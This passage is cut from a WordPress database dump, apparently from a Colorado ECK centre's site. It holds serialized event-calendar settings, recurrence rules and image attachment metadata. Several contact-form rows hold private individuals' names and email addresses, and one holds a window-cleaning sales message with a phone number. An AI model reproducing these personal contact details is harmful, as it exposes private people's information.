:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(116720,262869,'_EventEndDate','2020-12-06 12:45:00'),(116721,262869,'_EventStartDateUTC','2020-12-06 18:30:00'),(116722,262869,'_EventEndDateUTC','2020-12-06 19:45:00'),(116723,262869,'_EventDuration','4500'),(116724,262869,'_EventCurrencySymbol',''),(116725,262869,'_EventCurrencyPosition','prefix'),(116726,262869,'_EventCost',''),(116727,262869,'_EventURL',''),(116728,262869,'_EventTimezone','America/Denver'),(116729,262869,'_EventTimezoneAbbr','MST'),(24923,132183,'_pum_default_theme','1'),(24922,132183,'_pum_built_in','default-theme'),(8374,114734,'_EventOrigin','events-calendar'),(8375,114734,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";d:1565523784;s:10:\"_edit_last\";d:1565523801;s:10:\"post_title\";d:1566042704;s:12:\"post_content\";i:1579205957;s:11:\"post_status\";d:1565524070;s:16:\"tribe_events_cat\";i:1606947673;s:13:\"_thumbnail_id\";d:1565524070;s:24:\"boldgrid_hide_page_title\";d:1565524070;s:16:\"_EventRecurrence\";i:1606922473;s:17:\"_EventShowMapLink\";d:1565524070;s:13:\"_EventShowMap\";d:1565524070;s:13:\"_EventVenueID\";d:1566042704;s:15:\"_EventStartDate\";d:1566042704;s:13:\"_EventEndDate\";d:1566042704;s:18:\"_EventStartDateUTC\";d:1566042704;s:16:\"_EventEndDateUTC\";d:1566042704;s:14:\"_EventDuration\";d:1566042704;s:20:\"_EventCurrencySymbol\";d:1565524070;s:22:\"_EventCurrencyPosition\";d:1565524070;s:10:\"_EventCost\";d:1565524070;s:9:\"_EventURL\";d:1565524070;s:14:\"_EventTimezone\";d:1565524070;s:18:\"_EventTimezoneAbbr\";d:1565524070;s:27:\"_EventNextPendingRecurrence\";i:1604758815;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922486;s:16:\"protect_children\";i:1578926611;s:26:\"_RTECregistrationsDisabled\";i:1606922473;s:17:\"_RTECdeadlineType\";i:1606922473;s:19:\"_RTECwhoCanRegister\";i:1606922473;s:23:\"_RTEClimitRegistrations\";i:1606922473;s:21:\"_RTECmaxRegistrations\";i:1606922473;s:22:\"_EventHideFromUpcoming\";i:1606922473;}'),(8376,114734,'_edit_lock','1606947581:2'),(8377,114734,'_edit_last','2'),(118159,262872,'protect_children',''),(118160,262872,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513498;s:12:\"_EventOrigin\";i:1607513498;s:13:\"_thumbnail_id\";i:1607513498;s:26:\"_RTECregistrationsDisabled\";i:1607513498;s:17:\"_RTECdeadlineType\";i:1607513498;s:19:\"_RTECwhoCanRegister\";i:1607513498;s:23:\"_RTEClimitRegistrations\";i:1607513498;s:21:\"_RTECmaxRegistrations\";i:1607513498;s:24:\"boldgrid_hide_page_title\";i:1607513498;s:16:\"_EventRecurrence\";i:1607513498;s:17:\"_EventShowMapLink\";i:1607513498;s:13:\"_EventShowMap\";i:1607513498;s:13:\"_EventVenueID\";i:1607513498;s:20:\"_EventCurrencySymbol\";i:1607513498;s:22:\"_EventCurrencyPosition\";i:1607513498;s:10:\"_EventCost\";i:1607513498;s:9:\"_EventURL\";i:1607513498;s:14:\"_EventTimezone\";i:1607513498;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513498;}'),(118872,262955,'_EventShowMapLink','1'),(118187,262873,'_RTEClimitRegistrations','0'),(118188,262873,'_RTECmaxRegistrations','30'),(116795,262873,'_EventStartDate','2021-03-07 11:30:00'),(116796,262873,'_EventStartDateUTC','2021-03-07 18:30:00'),(118189,262873,'boldgrid_hide_page_title','0'),(116797,262873,'_EventEndDate','2021-03-07 12:45:00'),(118190,262873,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(8381,114734,'boldgrid_hide_page_title','0'),(8395,114734,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103401,114734,'_EventHideFromUpcoming','yes'),(103423,225321,'_RTECwhoCanRegister','any'),(103424,225321,'_RTEClimitRegistrations','0'),(8396,114734,'_EventShowMapLink','1'),(8397,114734,'_EventShowMap','1'),(18535,114734,'_EventVenueID','51883'),(8399,114734,'_EventStartDate','2019-09-01 22:30:00'),(8400,114734,'_EventEndDate','2019-09-01 23:30:00'),(8401,114734,'_EventStartDateUTC','2019-09-02 04:30:00'),(8402,114734,'_EventEndDateUTC','2019-09-02 05:30:00'),(8403,114734,'_EventDuration','3600'),(8404,114734,'_EventCurrencySymbol',''),(8405,114734,'_EventCurrencyPosition','prefix'),(8406,114734,'_EventCost',''),(8407,114734,'_EventURL',''),(8408,114734,'_EventTimezone','America/Denver'),(8409,114734,'_EventTimezoneAbbr','MDT'),(96857,114734,'_EventNextPendingRecurrence','2022-12-04 22:30:00'),(17869,129808,'_EventShowMap','1'),(104667,262482,'_field_182','CO'),(104668,262482,'_field_183','US'),(104669,262482,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(17868,129808,'_EventShowMapLink','1'),(94767,261877,'_edit_last','2'),(94766,261877,'_edit_lock','1599587524:2'),(17876,129808,'_EventCurrencyPosition','prefix'),(73587,254562,'_wp_attached_file','2020/01/book-of-ECK-parables-book-3.jpg'),(73588,254562,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:141;s:6:\"height\";i:217;s:4:\"file\";s:39:\"2020/01/book-of-ECK-parables-book-3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-3-141x150.jpg\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:37:\"book-of-ECK-parables-book-3-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-3-117x180.jpg\";s:5:\"width\";i:117;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-3-141x150.jpg\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73589,254563,'_wp_attached_file','2020/01/eck-essentials.jpg'),(73590,254563,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:144;s:6:\"height\";i:217;s:4:\"file\";s:26:\"2020/01/eck-essentials.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"eck-essentials-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:24:\"eck-essentials-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:26:\"eck-essentials-119x180.jpg\";s:5:\"width\";i:119;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:26:\"eck-essentials-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73591,254564,'_wp_attached_file','2020/01/how-the-inner-master-works.jpg'),(73592,254564,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:38:\"2020/01/how-the-inner-master-works.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"how-the-inner-master-works-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"how-the-inner-master-works-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"how-the-inner-master-works-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"how-the-inner-master-works-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(86227,129808,'_EventNextPendingRecurrence','2022-03-25 19:00:00'),(17879,129808,'_EventTimezone','America/Denver'),(17882,129808,'_EventVenueID','52162'),(17880,129808,'_EventTimezoneAbbr','MDT'),(85843,258360,'_wp_attached_file','2020/02/shariyat-ki-sugmad-book-2.jpg'),(85844,258360,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:146;s:6:\"height\";i:217;s:4:\"file\";s:37:\"2020/02/shariyat-ki-sugmad-book-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"shariyat-ki-sugmad-book-2-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:35:\"shariyat-ki-sugmad-book-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:37:\"shariyat-ki-sugmad-book-2-121x180.jpg\";s:5:\"width\";i:121;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:37:\"shariyat-ki-sugmad-book-2-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17861,129808,'_EventOrigin','events-calendar'),(17862,129808,'_tribe_modified_fields','a:26:{s:12:\"_EventOrigin\";d:1566042312;s:13:\"_thumbnail_id\";d:1566042312;s:24:\"boldgrid_hide_page_title\";d:1566042312;s:16:\"_EventRecurrence\";i:1582814538;s:17:\"_EventShowMapLink\";d:1566042312;s:13:\"_EventShowMap\";d:1566042312;s:15:\"_EventStartDate\";d:1566044624;s:13:\"_EventEndDate\";d:1566044624;s:18:\"_EventStartDateUTC\";d:1566044624;s:16:\"_EventEndDateUTC\";d:1566044624;s:14:\"_EventDuration\";d:1566042312;s:20:\"_EventCurrencySymbol\";d:1566042312;s:22:\"_EventCurrencyPosition\";d:1566042312;s:10:\"_EventCost\";d:1566042312;s:9:\"_EventURL\";d:1566042312;s:14:\"_EventTimezone\";d:1566042312;s:18:\"_EventTimezoneAbbr\";d:1566042312;s:27:\"_EventNextPendingRecurrence\";i:1582726965;s:13:\"_EventVenueID\";d:1566042312;s:16:\"tribe_events_cat\";i:1579232107;s:12:\"_dp_original\";d:1566042312;s:10:\"_edit_last\";d:1566042354;s:12:\"post_content\";i:1579206907;s:11:\"post_status\";d:1566042354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1579206919;s:16:\"protect_children\";i:1578926849;}'),(17863,129808,'_EventOrigin','events-calendar'),(17864,129808,'_tribe_modified_fields','a:26:{s:12:\"_EventOrigin\";d:1566042312;s:13:\"_thumbnail_id\";d:1566042312;s:24:\"boldgrid_hide_page_title\";d:1566042312;s:16:\"_EventRecurrence\";i:1582814538;s:17:\"_EventShowMapLink\";d:1566042312;s:13:\"_EventShowMap\";d:1566042312;s:15:\"_EventStartDate\";d:1566044624;s:13:\"_EventEndDate\";d:1566044624;s:18:\"_EventStartDateUTC\";d:1566044624;s:16:\"_EventEndDateUTC\";d:1566044624;s:14:\"_EventDuration\";d:1566042312;s:20:\"_EventCurrencySymbol\";d:1566042312;s:22:\"_EventCurrencyPosition\";d:1566042312;s:10:\"_EventCost\";d:1566042312;s:9:\"_EventURL\";d:1566042312;s:14:\"_EventTimezone\";d:1566042312;s:18:\"_EventTimezoneAbbr\";d:1566042312;s:27:\"_EventNextPendingRecurrence\";i:1582726965;s:13:\"_EventVenueID\";d:1566042312;s:16:\"tribe_events_cat\";i:1579232107;s:12:\"_dp_original\";d:1566042312;s:10:\"_edit_last\";d:1566042354;s:12:\"post_content\";i:1579206907;s:11:\"post_status\";d:1566042354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1579206919;s:16:\"protect_children\";i:1578926849;}'),(151801,266081,'mec_more_info',''),(73609,254573,'_wp_attached_file','2020/01/stranger-by-the-river.jpg'),(73610,254573,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:149;s:6:\"height\";i:217;s:4:\"file\";s:33:\"2020/01/stranger-by-the-river.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"stranger-by-the-river-149x150.jpg\";s:5:\"width\";i:149;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"stranger-by-the-river-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:33:\"stranger-by-the-river-124x180.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"stranger-by-the-river-149x150.jpg\";s:5:\"width\";i:149;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73627,254582,'_wp_attached_file','2020/01/the-tigers-fang.jpg'),(73625,254581,'_wp_attached_file','2020/01/the-spiritual-laws-of-ECK.jpg'),(73626,254581,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:146;s:6:\"height\";i:217;s:4:\"file\";s:37:\"2020/01/the-spiritual-laws-of-ECK.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"the-spiritual-laws-of-ECK-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:35:\"the-spiritual-laws-of-ECK-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:37:\"the-spiritual-laws-of-ECK-121x180.jpg\";s:5:\"width\";i:121;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:37:\"the-spiritual-laws-of-ECK-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121083,263203,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(121078,263203,'_EventCurrencyPosition','prefix'),(121052,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(121071,263203,'_EventShowMap',''),(121076,263203,'_EventDuration','3600'),(121077,263203,'_EventCurrencySymbol',''),(121051,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(94510,261786,'_field_133','Annah'),(93630,261715,'_field_133','Benny'),(93631,261715,'_field_134','Borkmann'),(93632,261715,'_field_135','benny@borkmann.de'),(92675,261616,'_field_133','Ricardo'),(92676,261616,'_field_134','Soto'),(92677,261616,'_field_135','rooftopviewprofessionalwindowc@gmail.com'),(92678,261616,'_field_137','Professional Window Cleaning'),(92679,261616,'_field_138','Hello,\n\nMy name is Ricardo and I am offering professional window cleaning services through the company Rooftop View Professional Window Cleaning, LLC.  Please contact me for a free estimate.  Thank you!\nrooftopviewpwc.net\n(720) 277 8681'),(58172,129808,'protect_children',''),(94765,261877,'popup_open_count','5'),(104789,262513,'popup_open_count_total','89'),(104790,262513,'popup_last_opened','1614510183'),(104791,262513,'enabled','1'),(104792,262513,'popup_conversion_count','2'),(104793,262513,'_dp_original','161672'),(104794,262513,'_edit_lock','1619294028:2'),(104795,262513,'_edit_last','2'),(17883,129808,'_dp_original','114734'),(17871,129808,'_EventEndDate','2019-09-27 19:30:00'),(17884,129808,'_edit_lock','1582839616:2'),(17874,129808,'_EventDuration','1800'),(17875,129808,'_EventCurrencySymbol',''),(11905,128250,'_EventOrigin','events-calendar'),(118887,262956,'_EventEndDateUTC','2021-04-11 16:15:00'),(118874,262955,'_EventVenueID','262507'),(118873,262955,'_EventShowMap','1'),(151791,266079,'original-file','2021/12/greek-ruin-1-updraft-pre-smush-original.jpg'),(118331,262880,'_RTECregistrationsDisabled','1'),(118332,262880,'_RTECdeadlineType','start'),(118333,262880,'_RTECwhoCanRegister','any'),(118334,262880,'_RTEClimitRegistrations','0'),(118335,262880,'_RTECmaxRegistrations','30'),(118329,262880,'_EventOrigin','events-calendar'),(118336,262880,'boldgrid_hide_page_title','0'),(118337,262880,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118338,262880,'_EventShowMapLink','1'),(118339,262880,'_EventShowMap','1'),(118340,262880,'_EventVenueID','262507'),(118341,262880,'_EventCurrencySymbol',''),(118342,262880,'_EventCurrencyPosition','prefix'),(118343,262880,'_EventCost',''),(118344,262880,'_EventURL',''),(118345,262880,'_EventTimezone','America/Denver'),(118346,262880,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118327,262880,'protect_children',''),(118328,262880,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(117038,262881,'_RTECdeadlineType','start'),(117039,262881,'_RTECwhoCanRegister','any'),(117040,262881,'_RTEClimitRegistrations','0'),(117041,262881,'_RTECmaxRegistrations','30'),(117042,262881,'boldgrid_hide_page_title','0'),(121081,263203,'_EventTimezone','America/Denver'),(121082,263203,'_EventTimezoneAbbr','MST'),(117056,262881,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117057,262881,'_EventShowMapLink','1'),(117058,262881,'_EventShowMap','1'),(117059,262881,'_EventVenueID','262507'),(117060,262881,'_EventStartDate','2020-12-13 12:15:00'),(117061,262881,'_EventEndDate','2020-12-13 13:45:00'),(117062,262881,'_EventStartDateUTC','2020-12-13 19:15:00'),(117063,262881,'_EventEndDateUTC','2020-12-13 20:45:00'),(117064,262881,'_EventDuration','5400'),(117065,262881,'_EventCurrencySymbol',''),(117066,262881,'_EventCurrencyPosition','prefix'),(117067,262881,'_EventCost',''),(117068,262881,'_EventURL',''),(117069,262881,'_EventTimezone','America/Denver'),(117070,262881,'_EventTimezoneAbbr','MST'),(117372,262893,'protect_children',''),(117373,262893,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607512505;s:12:\"_EventOrigin\";i:1607512505;s:10:\"_edit_last\";i:1607512519;s:10:\"post_title\";i:1607512531;s:11:\"post_status\";i:1607512642;s:12:\"post_content\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:24:\"boldgrid_hide_page_title\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:1